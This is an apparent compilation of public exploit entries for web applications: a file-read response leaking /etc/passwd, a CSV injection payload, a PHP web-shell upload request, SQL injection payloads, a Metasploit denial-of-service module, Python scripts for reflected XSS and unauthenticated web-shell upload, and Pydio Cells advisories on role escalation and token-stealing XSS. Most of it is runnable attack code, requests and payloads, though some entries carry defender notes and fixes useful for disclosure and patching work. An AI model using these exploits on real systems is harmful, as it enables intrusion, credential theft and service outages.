Content-Disposition: form-data; name="private" -----------------------------104219633614133026962934729021 Content-Disposition: form-data; name="folder" / -----------------------------104219633614133026962934729021 Content-Disposition: form-data; name="skip_auto_crop" true -----------------------------104219633614133026962934729021-- Response: Response: HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK Set-Cookie: cookie Content-Length: 1816 File format not allowed (dqopiroot:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin fdfdsf)
  15. Exploit Title: Rukovoditel 3.3.1 - CSV injection Version: 3.3.1 Bugs: CSV Injection Technology: PHP Vendor URL: https://www.rukovoditel.net/ Software Link: https://www.rukovoditel.net/download.php Date found: 27-05-2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technical Details & POC ======================================== Step 1. Log in as a user. Step 2. Go to My Account ( http://127.0.0.1/index.php?module=users/account ). Step 3. Set Firstname to =calc|a!z|. Step 4. When an admin exports customers as a CSV file, the CSV injection fires on the admin's computer and opens the calculator (http://localhost/index.php?module=items/items&path=1). payload: =calc|a!z|
  16. Exploit Title: - unilogies/bumsys v1.0.3-beta - Unrestricted File Upload Google Dork : NA Date: 19-01-2023 Exploit Author: AFFAN AHMED Vendor Homepage: https://github.com/unilogies/bumsys Software Link: https://github.com/unilogies/bumsys/archive/refs/tags/v1.0.3-beta.zip Version: 1.0.3-beta Tested on: Windows 11, XAMPP-8.2.0 CVE : CVE-2023-0455 ================================ Steps_TO_Reproduce ================================ - Navigate to this URL:[https://demo.bumsys.org/settings/shop-list/](https://demo.bumsys.org/settings/shop-list/) - Click on action button to edit the Profile - Click on select logo button to upload the image - Intercept the POST Request and do the below changes . ================================================================ Burpsuite-Request ================================================================ POST /xhr/?module=settings&page=updateShop HTTP/1.1 Host: demo.bumsys.org Cookie: eid=1; currencySymbol=%EF%B7%BC; keepAlive=1; __0bb0b4aaf0f729565dbdb80308adac3386976ad3=9lqop41ssg3i9trh73enqbi0i7 Content-Length: 1280 Sec-Ch-Ua: "Chromium";v="109", "Not_A Brand";v="99" X-Csrf-Token: 78abb0cc27ab54e87f66e8160dab3ab48261a8b4 Sec-Ch-Ua-Mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundarynO0QAD84ekUMuGaA Accept: */* X-Requested-With: XMLHttpRequest Sec-Ch-Ua-Platform: "Windows" Origin: https://demo.bumsys.org Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://demo.bumsys.org/settings/shop-list/ Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close ------WebKitFormBoundarynO0QAD84ekUMuGaA Content-Disposition: form-data; name="shopName" TEST ------WebKitFormBoundarynO0QAD84ekUMuGaA Content-Disposition: form-data; name="shopAddress" test ------WebKitFormBoundarynO0QAD84ekUMuGaA Content-Disposition: form-data; 
name="shopCity" testcity ------WebKitFormBoundarynO0QAD84ekUMuGaA Content-Disposition: form-data; name="shopState" teststate ------WebKitFormBoundarynO0QAD84ekUMuGaA Content-Disposition: form-data; name="shopPostalCode" 700056 ------WebKitFormBoundarynO0QAD84ekUMuGaA Content-Disposition: form-data; name="shopCountry" testIND ------WebKitFormBoundarynO0QAD84ekUMuGaA Content-Disposition: form-data; name="shopPhone" 895623122 ------WebKitFormBoundarynO0QAD84ekUMuGaA Content-Disposition: form-data; name="shopEmail" [email protected] ------WebKitFormBoundarynO0QAD84ekUMuGaA Content-Disposition: form-data; name="shopInvoiceFooter" ------WebKitFormBoundarynO0QAD84ekUMuGaA Content-Disposition: form-data; name="shopLogo"; filename="profile picture.php" Content-Type: image/png <?php echo system($_REQUEST['dx']); ?> ==================================================================================== Burpsuite-Response ==================================================================================== HTTP/1.1 200 OK Date: Thu, 19 Jan 2023 07:14:26 GMT Server: Apache/2.4.51 (Unix) OpenSSL/1.0.2k-fips X-Powered-By: PHP/7.0.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 65 <div class='alert alert-success'>Shop successfully updated.</div> ==================================================================================== VIDEO-POC : https://youtu.be/nwxIoSlyllQ
  17. ## Exploit Title: SCRMS 2023-05-27 1.0 - Multiple SQLi ## Author: nu11secur1ty ## Date: 05.27.2023 ## Vendor: https://github.com/oretnom23 ## Software: https://www.sourcecodester.com/php/15895/simple-customer-relationship-management-crm-system-using-php-free-source-coude.html ## Reference: https://portswigger.net/web-security/sql-injection ## Description: The `email` parameter appears to be vulnerable to SQL injection attacks. The test payloads 45141002' or 6429=6429-- and 37491017' or 5206=5213-- were each submitted in the email parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way. The attacker can easily steal all users and their passwords for access to the system. Even if the passwords are strongly encrypted, recovering them will take some time; if they are not encrypted strongly enough, this is not a problem for an attacker. STATUS: HIGH Vulnerability [+]Payload: ```mysql --- Parameter: email (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: email=-1544' OR 2326=2326-- eglC&password=c5K!k0k!T7&login= --- ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/SCRMS-2023-05-27-1.0) ## Proof and Exploit: [href](https://www.nu11secur1ty.com/2023/05/scrms-2023-05-27-10-multiple-sqli.html) ## Time spent: 01:00:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/https://cve.mitre.org/index.html and https://www.exploit-db.com/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>
  # 18.
##
# Exploit Title: Flexense HTTP Server 10.6.24 - Buffer Overflow (DoS) (Metasploit)
# Date: 2018-03-09
# Exploit Author: Ege Balci
# Vendor Homepage: https://www.flexense.com/downloads.html
# Version: <= 10.6.24
# CVE : CVE-2018-8065
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Auxiliary DoS module: fingerprints the Flexense HTTP server banner, then
# sends repeated HTTP requests carrying an oversized Accept header until the
# target stops accepting connections.
#
# Defender notes (derived from the traffic this module generates):
#   - Detection: a burst of GET requests to random single-path URLs whose
#     Accept header is several thousand identical bytes ('A' * PacketSize),
#     each on a fresh TCP connection, from one source.
#   - Mitigation: upgrade past 10.6.24; front the service with a reverse
#     proxy that enforces a sane maximum header size.
class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Dos
  include Msf::Exploit::Remote::Tcp

  # Module metadata and user-tunable options (RPORT, PacketCount, PacketSize).
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Flexense HTTP Server Denial Of Service',
      'Description'    => %q{ This module triggers a Denial of Service vulnerability in the Flexense HTTP server. Vulnerability caused by a user mode write access memory violation and can be triggered with rapidly sending variety of HTTP requests with long HTTP header values. Multiple Flexense applications that are using Flexense HTTP server 10.6.24 and below vesions reportedly vulnerable. },
      'Author'         => [ 'Ege Balci <[email protected]>' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2018-8065'],
          [ 'URL', 'https://github.com/EgeBalci/Sync_Breeze_Enterprise_10_6_24_-DOS' ],
        ],
      'DisclosureDate' => '2018-03-09'))

    # Both counts are declared as OptString even though they are used as
    # numbers; PacketSize is converted with .to_i in run, PacketCount is not
    # (see the note there).
    register_options(
      [
        Opt::RPORT(80),
        OptString.new('PacketCount', [ true, "The number of packets to be sent (Recommended: Above 1725)" , 1725 ]),
        OptString.new('PacketSize', [ true, "The number of bytes in the Accept header (Recommended: 4088-5090" , rand(4088..5090) ])
      ])
  end

  # Banner check: one plain GET, then a substring match on the response.
  # Returns Appears only on the exact string 'Flexense HTTP Server v10.6.24';
  # other versions the advisory header calls affected ("<= 10.6.24") are
  # reported as Safe.
  def check
    begin
      connect
      sock.put("GET / HTTP/1.0\r\n\r\n")
      res = sock.get
      if res and res.include? 'Flexense HTTP Server v10.6.24'
        Exploit::CheckCode::Appears
      else
        Exploit::CheckCode::Safe
      end
    rescue Rex::ConnectionRefused
      print_error("Target refused the connection")
      Exploit::CheckCode::Unknown
    # Bare rescue catches any StandardError (timeouts included) and reports
    # it as "did not respond".
    rescue
      print_error("Target did not respond to HTTP request")
      Exploit::CheckCode::Unknown
    end
  end

  # Sends requests in a loop; treats a connection refusal as success.
  # Returns true on refusal, otherwise falls through after the loop.
  def run
    unless check == Exploit::CheckCode::Appears
      fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
    end

    size = datastore['PacketSize'].to_i
    print_status("Starting with packets of #{size}-byte strings")
    count = 0
    loop do
      payload = ""
      payload << "GET /" + Rex::Text.rand_text_alpha(rand(30)) + " HTTP/1.1\r\n"
      payload << "Host: 127.0.0.1\r\n"
      payload << "Accept: "+('A' * size)+"\r\n"
      payload << "\r\n\r\n"
      begin
        connect
        sock.put(payload)
        disconnect
        count += 1
        # NOTE(review): count is an Integer while datastore values are
        # normally Strings, so this comparison likely never matches and the
        # loop only ends on ConnectionRefused; compare against
        # datastore['PacketCount'].to_i — confirm against the framework
        # version in use.
        break if count==datastore['PacketCount']
      rescue ::Rex::InvalidDestination
        print_error('Invalid destination! Continuing...')
      rescue ::Rex::ConnectionTimeout
        print_error('Connection timeout! Continuing...')
      rescue ::Errno::ECONNRESET
        print_error('Connection reset! Continuing...')
      rescue ::Rex::ConnectionRefused
        print_good("DoS successful after #{count} packets with #{size}-byte headers")
        return true
      end
    end
    print_error("DoS failed after #{count} packets of #{size}-byte strings")
  end
end
  # 19.
# Exploit Title: Online Security Guards Hiring System 1.0 – REFLECTED XSS
# Google Dork : NA
# Date: 23-01-2023
# Exploit Author : AFFAN AHMED
# Vendor Homepage: https://phpgurukul.com
# Software Link: https://phpgurukul.com/projects/Online-Security-Guard-Hiring-System_PHP.zip
# Version: 1.0
# Tested on: Windows 11 + XAMPP + PYTHON-3.X
# CVE : CVE-2023-0527
# NOTE: TO RUN THE PROGRAM FIRST SETUP THE CODE WITH XAMPP AND THEN RUN THE BELOW PYTHON CODE TO EXPLOIT IT
# Below code checks both the adminname parameter of /admin-profile.php and the search parameter of /search.php
# POC-LINK: https://github.com/ctflearner/Vulnerability/blob/main/Online-Security-guard-POC.md
#
# What this script does: it POSTs the hard-coded admin credentials to
# admin/login.php, then POSTs a profile update whose "adminname" field holds a
# <script> tag and reports whether that tag is echoed back unescaped.
# Defender note: the fix is on the application side — HTML-encode adminname
# (and searchdata) on output; a CSP without 'unsafe-inline' limits the impact.

import requests
import re
from colorama import Fore

print(Fore.YELLOW + "######################################################################" + Fore.RESET)
print(Fore.RED + "# TITLE: Online Security Guards Hiring System v1.0" + Fore.RESET)
print(Fore.RED + "# VULNERABILITY-TYPE : CROSS-SITE SCRIPTING (XSS)" + Fore.RESET)
print(Fore.RED + "# VENDOR OF THE PRODUCT : PHPGURUKUL" + Fore.RESET)
print(Fore.RED + "# AUTHOR : AFFAN AHMED" + Fore.RESET)
print(Fore.YELLOW +"######################################################################" + Fore.RESET)
print()
print(Fore.RED+"NOTE: To RUN THE CODE JUST TYPE : python3 exploit.py"+ Fore.RESET)
print()

# NAVIGATING TO ADMIN LOGIN PAGE
Website_url = "http://localhost/osghs/admin/login.php" # CHANGE THE URL ACCORDING TO YOUR SETUP
print(Fore.RED+"----------------------------------------------------------------------"+ Fore.RESET)
print(Fore.CYAN + "[**] Inserting the Username and Password in the Admin Login Form [**]" + Fore.RESET)
print(Fore.RED+"----------------------------------------------------------------------"+Fore.RESET)

Admin_login_credentials = {'username': 'admin', 'password': 'Test@123', 'login': ''}
# NOTE(review): the Cookie header below is a fixed PHPSESSID and both requests
# are sent with bare requests.* calls rather than a requests.Session, so the
# session cookie issued by login.php is never picked up; the second request
# only works if this hard-coded value matches a live server session — confirm.
headers = {
    'Content-Type': 'application/x-www-form-urlencoded',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
    'Referer': 'http://localhost/osghs/admin/login.php',
    'Accept-Encoding': 'gzip, deflate',
    'Accept-Language': 'en-US,en;q=0.9',
    'Connection': 'close',
    'Cookie': 'PHPSESSID=8alf0rbfjmhm3ddra7si0cv7qc',
    'Sec-Fetch-Site': 'same-origin',
    'Sec-Fetch-Mode': 'navigate',
    'Sec-Fetch-User': '?1',
    'Sec-Fetch-Dest': 'document'
}
response = requests.request("POST", Website_url, headers=headers, data = Admin_login_credentials)
if response.status_code == 200:
    # Login success is inferred from a client-side redirect in the HTML body;
    # the unescaped '.' in the pattern also matches any single character.
    location = re.findall(r'document.location =\'(.*?)\'',response.text)
    if location:
        print(Fore.GREEN + "> Login Successful into Admin Account"+Fore.RESET)
        print(Fore.GREEN + "> Popup:"+ Fore.RESET,location )
    else:
        print(Fore.GREEN + "> document.location not found"+ Fore.RESET)
else:
    # NOTE(review): status_code is an int, so `+ Fore.RESET` raises TypeError
    # on every non-200 response instead of printing the error.
    print(Fore.GREEN + "> Error:", response.status_code + Fore.RESET)
print(Fore.RED+"----------------------------------------------------------------------"+ Fore.RESET)
print(Fore.CYAN + " [**] Trying XSS-PAYLOAD in Admin-Name Parameter [**]" + Fore.RESET)

# NAVIGATING TO ADMIN PROFILE SECTION TO UPDATE ADMIN PROFILE
# INSTEAD OF /ADMIN-PROFILE.PHP REPLACE WITH /search.php TO FIND XSS IN SEARCH PARAMETER
Website_url= "http://localhost/osghs/admin/admin-profile.php" # CHANGE THIS URL ACCORDING TO YOUR PREFERENCE
# FOR CHECKING XSS IN ADMIN-PROFILE USE THE BELOW PAYLOAD
# FOR CHECKING XSS IN SEARCH.PHP SECTION REPLACE EVERYTHING AND PUT searchdata=<your-xss-payload>&search=""
payload = {
    "adminname": "TESTAdmin<script>alert(\"From-Admin-Name\")</script>", # XSS-Payload , CHANGE THIS ACCORDING TO YOUR PREFERENCE
    "username": "admin", # THESE DETAILS ARE RANDOM , CHANGE IT TO YOUR PREFERENCE
    "mobilenumber": "8979555558",
    "email": "[email protected]",
    "submit": "",
}
# SENDING THE REQUEST WITH POST (same fixed headers / cookie as the login request)
response = requests.post(Website_url, headers=headers, data=payload)
print(Fore.RED+"----------------------------------------------------------------------"+ Fore.RESET)
# CHECKING THE STATUS CODE 200 AND ALSO FINDING THE SCRIPT TAG WITH THE HELP OF REGEX
# A non-empty `scripts` list means the tag was reflected without encoding;
# a non-200 response prints nothing at all (no else branch).
if response.status_code == 200:
    scripts = re.findall(r'<script>alert\(.*?\)</script>', response.text)
    print(Fore.GREEN + "> Response After Executing the Payload at adminname parameter : "+ Fore.RESET)
    print(Fore.GREEN+">"+Fore.RESET,scripts)
  # 20.
# Exploit Title: Faculty Evaluation System 1.0 - Unauthenticated File Upload
# Date: 5/29/2023
# Author: Alex Gan
# Vendor Homepage: https://www.sourcecodester.com/php/14635/faculty-evaluation-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/eval_2.zip
# Version: 1.0
# Tested on: LAMP Fedora server 38 (Thirty Eight) Apache/2.4.57 10.5.19-MariaDB PHP 8.2.6
# CVE: CVE-2023-33440
# References: https://nvd.nist.gov/vuln/detail/CVE-2023-33440
# https://www.exploit-db.com/exploits/49320
# https://github.com/F14me7wq/bug_report/tree/main/vendors/oretnom23/faculty-evaluation-system
#
# #!/usr/bin/env python3
#
# What this script does: it sends one multipart POST (field name "img") to
# /ajax.php?action=save_user without any session, then fetches the directory
# listing at /assets/uploads/ and looks for a link ending in the uploaded
# file's name.
# Defender notes: the request carries no authentication and the file keeps
# its original name, so the server-side fix is to require an authenticated
# session on save_user, validate type/extension, rename on storage, and keep
# uploads (or at least directory listing) out of the web root. For detection,
# watch for unauthenticated POSTs to that action followed by a GET of the
# uploads directory.

import os
import sys
import requests
import argparse
from bs4 import BeautifulSoup
from urllib.parse import urlparse
from requests.exceptions import ConnectionError, Timeout


def get_args():
    """Parse the -u/--url and -p/--payload command-line options.

    Returns:
        argparse.Namespace with ``url`` and ``payload`` (both may be None).
    """
    parser = argparse.ArgumentParser()
    parser.add_argument('-u', '--url', type=str, help='URL')
    parser.add_argument('-p', '--payload', type=str, help='PHP webshell')
    return parser.parse_args()


def get_user_input(args):
    """Prompt interactively for any option that was not given on the command line.

    Args:
        args: the Namespace from get_args(); it is mutated in place.

    Returns:
        Tuple ``(url, payload)`` as strings.
    """
    if not (args.url):
        args.url = input('Use the -u argument or Enter URL:')
    if not (args.payload):
        args.payload = input('Use the -p argument or Enter file path PHP webshell: ')
    return args.url, args.payload


def check_input_url(url):
    """Normalise the target URL: add ``http://`` when no scheme is present and drop a trailing slash.

    Args:
        url: the raw user-supplied URL.

    Returns:
        The normalised URL string.
    """
    parsed_url = urlparse(url)
    if not parsed_url.scheme:
        url = 'http://' + url
    # NOTE(review): the trailing-slash test uses the parse of the ORIGINAL
    # string; for a scheme-less "host:port/" input urlparse may treat the host
    # as the scheme, so the result can differ from a re-parse — confirm.
    if parsed_url.path.endswith('/'):
        url = url.rstrip('/')
    return url


def check_host_availability(url):
    """Exit the process unless ``<url>/login.php`` answers a HEAD request with 200.

    Args:
        url: normalised base URL (see check_input_url).

    Side effects:
        Prints a status line; calls sys.exit() (status 0) on any failure.
    """
    try:
        response = requests.head(url=url + '/login.php')
        if response.status_code == 200:
            print("[+] Host is accessible")
        else:
            print("[-] Host is not accessible")
            print(" Status code:", response.status_code)
            sys.exit()
    # `e` is bound but unused in this branch; the message hides the cause.
    except (ConnectionError, Timeout) as e:
        print("[-] Host is not accessible")
        sys.exit()
    except requests.exceptions.RequestException as e:
        print("[-] Error:", e)
        sys.exit()


def make_request(url, method, files=None):
    """Send a GET or multipart POST and return the body on HTTP 200.

    Args:
        url: absolute URL to request.
        method: ``'GET'`` or ``'POST'`` (anything else raises ValueError).
        files: ``files=`` argument passed straight to requests.post.

    Returns:
        ``response.text`` on status 200, otherwise None (after printing the error).

    Raises:
        ValueError: for an unsupported ``method``.
    """
    if method == 'GET':
        response = requests.get(url)
    elif method == 'POST':
        response = requests.post(url, files=files)
    else:
        raise ValueError(f'Invalid HTTP method: {method}')
    if response.status_code == 200:
        print('[+] Request successful')
        return response.text
    else:
        print(f'[-] Error {response.status_code}: {response.text}')
        return None


def find_file(response_get, filename, find_url):
    """Scan an HTML directory listing for anchors whose href ends with ``filename`` and print them.

    Args:
        response_get: HTML text of the listing page (None if the GET failed,
            which BeautifulSoup will reject).
        filename: base name of the uploaded file.
        find_url: URL prefix printed in front of each matching href.
    """
    soup = BeautifulSoup(response_get, 'html.parser')
    links = soup.find_all('a')
    found_files = []
    for link in links:
        # NOTE(review): get('href') returns None for an <a> without href,
        # which would make .endswith raise AttributeError.
        file_upl = link.get('href')
        if file_upl.endswith(filename):
            found_files.append(file_upl)
    if found_files:
        print(' File found:')
        for file in found_files:
            print('[*] ' + file)
        print(' Full URL of your file:')
        for file_url in found_files:
            print('[*] ' + find_url + file_url)
    else:
        print('[-] File not found')


def main():
    """Entry point: collect options, check the host, upload, then locate the file in the listing."""
    args = get_args()
    url, payload = get_user_input(args)
    url = check_input_url(url)
    check_host_availability(url)
    post_url = url + "/ajax.php?action=save_user"
    get_url = url + "/assets/uploads/"
    filename = os.path.basename(payload)
    # NOTE(review): the file handle opened here is never closed; a `with`
    # block (or closing it after make_request) would fix the leak.
    payload_file = [('img',(filename,open(args.payload,'rb'),'application/octet-stream'))]
    print(" Loading payload file")
    make_request(post_url, 'POST', files=payload_file)
    print(" Listing the uploads directory")
    # response_get is None when the listing is not reachable; find_file does
    # not guard against that.
    response_get = make_request(get_url, 'GET')
    print(" Finding the downloaded payload file")
    find_file(response_get, filename, get_url)


if __name__ == "__main__":
    main()
  21. Exploit Title: Pydio Cells 4.1.2 - Unauthorised Role Assignments Affected Versions: 4.1.2 and earlier versions Fixed Versions: 4.2.0, 4.1.3, 3.0.12 Vulnerability Type: Privilege Escalation Security Risk: high Vendor URL: https://pydio.com/ Vendor Status: notified Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2023-003 Advisory Status: published CVE: CVE-2023-32749 CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32749 Introduction ============ "Pydio Cells is an open-core, self-hosted Document Sharing and Collaboration platform (DSC) specifically designed for organizations that need advanced document sharing and collaboration without security trade-offs or compliance issues." (from the vendor's homepage) More Details ============ Users can share cells or folders with other users on the same Pydio instance. The web application allows to either select an already existing user from a list or to create a new user by entering a new username and password, if this functionality is enabled. When creating a new user in this way, a HTTP PUT request like the following is sent: ------------------------------------------------------------------------ PUT /a/user/newuser HTTP/2 Host: example.com User-Agent: agent Authorization: Bearer O48gvjD[...] Content-Type: application/json Content-Length: 628 Cookie: token=AO[...] { "Attributes": { "profile": "shared", "parameter:core.conf:lang": "\"en-us\"", "send_email": "false" }, "Roles": [], "Login": "newuser", "Password": "secret!", "GroupPath": "/", "Policies": [...] } ------------------------------------------------------------------------ The JSON object sent in the body contains the username and password for the user to be created and an empty list for the key "Roles". 
The response contains a JSON object similar to the following: ------------------------------------------------------------------------ { "Uuid": "58811c4c-2286-4ca0-8e8a-14ab9dbca8ce", "GroupPath": "/", "Attributes": { "parameter:core.conf:lang": "\"en-us\"", "profile": "shared" }, "Roles": [ { "Uuid": "EXTERNAL_USERS", "Label": "External Users", "Policies": [...] }, { "Uuid": "58811c4c-2286-4ca0-8e8a-14ab9dbca8ce", "Label": "User newuser", "UserRole": true, "Policies": [...] } ], "Login": "newuser", "Policies": [....], "PoliciesContextEditable": true } ------------------------------------------------------------------------ The key "Roles" now contains a list with two objects, which seem to be applied by default. The roles list in the HTTP request can be modified to contain a list of all available UUIDs for roles, which can be obtained by using the user search functionality. This results in a new user account with all roles applied. By performing a login as the newly created user, access to all cells and non-personal workspaces of the whole Pydio instance is granted. Proof of Concept ================ Login to the Pydio Cells web interface with a regular user and retrieve the JWT from the HTTP requests. This can either be done using an HTTP attack proxy or using the browser's developer tools. 
Subsequently, curl [1] can be used as follows to retrieve a list of all users and their roles: ------------------------------------------------------------------------ $ export JWT="<insert JWT here>" $ curl --silent \ --header "Authorization: Bearer $TOKEN" \ --header 'Content-Type: application/json' \ --data '{}' \ https://example.com/a/user | tee all_users.json {"Users":[...]} ------------------------------------------------------------------------ Afterwards, jq [2] can be used to create a JSON document which can be sent to the Pydio REST-API in order to create the external user "foobar" with the password "hunter2" and all roles assigned: ------------------------------------------------------------------------ $ jq '.Users[].Roles' all_users.json \ | jq -s 'flatten | .[].Uuid | {Uuid: .}' \ | jq -s 'unique' \ | jq '{"Login": "foobar", "Password": "hunter2", "Attributes": {"profile": "shared"}, "Roles": .}' \ | tee create_user.json { "Login": "foobar", "Password": "hunter2", "Attributes": { "profile": "shared" }, "Roles": [...] } ------------------------------------------------------------------------ Finally, the following curl command can be issued to create the new external user: ------------------------------------------------------------------------ $ curl --request PUT \ --silent \ --header "Authorization: Bearer $JWT" \ --header 'Content-Type: application/json' \ --data @create_user.json \ https://example.com/a/user/foobar ------------------------------------------------------------------------ Now, login with the newly created user to access all cells and non-personal workspaces. Workaround ========== Disallow the creation of external users in the authentication settings. Fix === Upgrade Pydio Cells to a version without the vulnerability. Security Risk ============= Attackers with access to any regular user account for a Pydio Cells instance can extend their privileges by creating a new external user with all roles assigned. 
Subsequently, they can access all folders and files in any cell and workspace, except for personal workspaces. The creation of external users is activated by default. Therefore, the vulnerability is estimated to pose a high risk. Timeline ======== 2023-03-23 Vulnerability identified 2023-05-02 Customer approved disclosure to vendor 2023-05-02 Vendor notified 2023-05-03 CVE ID requested 2023-05-08 Vendor released fixed version 2023-05-14 CVE ID assigned 2023-05-16 Vendor asks for a few more days before the advisory is released 2023-05-30 Advisory released References ========== [1] https://curl.se/ [2] https://stedolan.github.io/jq/ RedTeam Pentesting GmbH ======================= RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/ Working at RedTeam Pentesting ============================= RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit: https://jobs.redteam-pentesting.de/
  22. Exploit Title: Pydio Cells 4.1.2 - Cross-Site Scripting (XSS) via File Download Affected Versions: 4.1.2 and earlier versions Fixed Versions: 4.2.0, 4.1.3, 3.0.12 Vulnerability Type: Cross-Site Scripting Security Risk: high Vendor URL: https://pydio.com/ Vendor Status: notified Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2023-004 Advisory Status: published CVE: CVE-2023-32751 CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32751 Introduction ============ "Pydio Cells is an open-core, self-hosted Document Sharing and Collaboration platform (DSC) specifically designed for organizations that need advanced document sharing and collaboration without security trade-offs or compliance issues." (from the vendor's homepage) More Details ============ When a file named "xss.html" is downloaded in the Pydio Cells web application, a download URL similar to the following is generated: https://example.com/io/xss/xss.html ?AWSAccessKeyId=gateway &Expires=1682495748 &Signature=920JV0Zy%2BrNYXjak7xksAxRpRp8%3D &response-content-disposition=attachment%3B%20filename%3Dxss.html &pydio_jwt=qIe9DUut-OicxRzNVlynMf6CTENB0J-J[...] The URL is akin to a presigned URL as used by the Amazon S3 service. It contains the URL parameter "response-content-disposition" which is set to "attachment" causing the response to contain a "Content-Disposition" header with that value. Therefore, the browser downloads the file instead of interpreting it. The URL also contains a signature and expiry timestamp, which are checked by the backend. Unlike a presigned URL as used by S3, the URL also contains the parameter "pydio_jwt" with the JWT of the user for authentication. 
Furthermore, the access key with the ID "gateway" is referenced, which can be found in the JavaScript sources of Pydio Cells together with the secret: ------------------------------------------------------------------------ _awsSdk.default.config.update({ accessKeyId: 'gateway', secretAccessKey: 'gatewaysecret', s3ForcePathStyle: !0, httpOptions: { timeout: PydioApi.getMultipartUploadTimeout() } }); ------------------------------------------------------------------------ With this information it is possible to change the URL parameter "response-content-disposition" to the value "inline" and then calculate a valid signature for the resulting URL. Furthermore, the content type of the response can be changed to "text/html" by also adding the URL parameter "response-content-type" with that value. This would result in a URL like the following for the previously shown example URL: https://example.com/io/xss/xss.html? AWSAccessKeyId=gateway &Expires=1682495668 &Signature=HpKue0YQZrnp%2B665Jf1t7ONgfRg%3D &response-content-disposition=inline &response-content-type=text%2Fhtml &pydio_jwt=qIe9DUut-OicxRzNVlynMf6CTENB0J-J[...] Upon opening the URL in a browser, the HTML included in the file is interpreted and any JavaScript code is run. Proof of Concept ================ Upload a HTML file into an arbitrary location of a Pydio Cells instance. For example with the following contents: ------------------------------------------------------------------------ <html> <body> <h1>Cross-Site Scriping</h1> <script> let token = JSON.parse(localStorage.token4).AccessToken; alert(token); </script> </body> </html> ------------------------------------------------------------------------ The contained JavaScript code reads the JWT access token for Pydio Cells from the browser's local storage object and opens a message box. Instead of just displaying the JWT, it could also be sent to an attacker. 
The following JavaScript function can then be run within the browser's developer console to generate a presigned URL for the HTML file: ------------------------------------------------------------------------ async function getPresignedURL(path) { let client = PydioApi.getClient(); let node = new AjxpNode(path); let metadata = {Bucket: "io", ResponseContentDisposition: "inline", Key: path, ResponseContentType: "text/html"}; let url = await client.buildPresignedGetUrl(node, null, "text/html", metadata); return url; } await getPresignedURL("xss/xss.html"); ------------------------------------------------------------------------ The code has to be run in context of Pydio Cells while being logged in. If the resulting URL is opened in a browser, the JavaScript code contained in the HTML file is run. If the attack is conducted in the described way, the JWT of the attacker is exposed through the URL. However, this can be circumvented by first generating a public URL for the file and then constructing the presigned URL based on the resulting download URL. Workaround ========== No workaround known. Fix === Upgrade Pydio Cells to a version without the vulnerability. Security Risk ============= Attackers that can upload files to a Pydio Cells instance can construct URLs that execute arbitrary JavaScript code in context of Pydio Cells upon opening. This could for example be used to steal the authentication tokens of users opening the URL. It is likely that such an attack succeeds, since sharing URLs to files hosted using Pydio Cells is a common use case of the application. Therefore, the vulnerability is estimated to pose a high risk. 
